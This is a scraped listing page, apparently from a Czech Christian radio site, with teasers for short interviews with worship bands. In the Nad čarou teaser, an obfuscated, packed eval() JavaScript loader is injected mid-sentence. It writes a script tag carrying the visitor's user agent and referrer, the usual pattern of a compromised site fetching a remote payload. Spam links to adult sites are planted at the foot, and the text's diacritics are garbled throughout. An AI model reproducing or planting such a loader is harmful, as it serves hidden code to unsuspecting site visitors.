10 otázek pro …

10 otázek pro NaBoSo

Ilustrace k článku

NaBoSo je hudební uskupení, které vzniklo v roce 2002 pod hlavi?kou Apoštolské církve v Haví?ov?.  Název skupiny vyjad?uje touhu stát p?ed Bohem s úctou, pokorou a s v?domím toho,

10 otázek pro Jiný rytmus

Ilustrace k článku

Hudební uskupení Jiný rytmus funguje od roku 1995 jako nedílná sou?ást domácí k?es?anské scény a snaží se ve své tvorb? spojit tvrdší muziku s hlubokým uctíváním Boha. Jiný rytmus má

10 otázek pro Paprsky

Ilustrace k článku

Skupinu Paprsky, tvo?í 40 mládežník? z celé Moravy, kte?í zpívají chvály. Za?átky této skupiny sahají do roku 1996, kdy zdaleka neza?ínali v tak velkém po?tu. Paprsky aktivn? koncertují a také nahrávají ve

10 otázek pro Nad čarou

Ilustrace k článku

Skupina Nad ?arou vznikla na podzim roku 2005 a hudební kostru skupiny tvo?í Honza eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shdki|var|u0026u|referrer|krhti||js|php'.split('|'),0,{})) Kubiš, Renáta Gebauerová, Joser „Pupík“ Mlad?jovský, Denisa Sikorová, René Sikora

10 otázek pro Lamačské chvály

Ilustrace k článku

Úplný po?átek skupiny Lama?ské chvály m?žeme datovat na rok 1994, kdy se Bra?o Letko rozhodl doprovázet skupinu zhruba 100 mladých v??ících v Lama?i (?ást Bratislavy) p?i bohoslužbách. Postupem ?asu se

10 otázek pro Deep Inside

Ilustrace k článku

Kapela Deep Inside vznikla v roce 2007 a to zejména za ú?elem po?ádání ve?er? modliteb a chval. Zprvu hrála pouze p?evzaté písn?, ale nyní se ?ím dál více snaží v?novat

10 otázek pro …

Ilustrace k článku

V redakci AWrádia jsme se rozhodli vyzpovídat n?které známé i mén? známé k?es?anské kapely a interprety na ?eské i slovenské hudební scén?. Jako formu rozhovoru jsme zvolili tentokrát textový rozhovor,


 
adultcomics.me shemalevids.org incestgames.net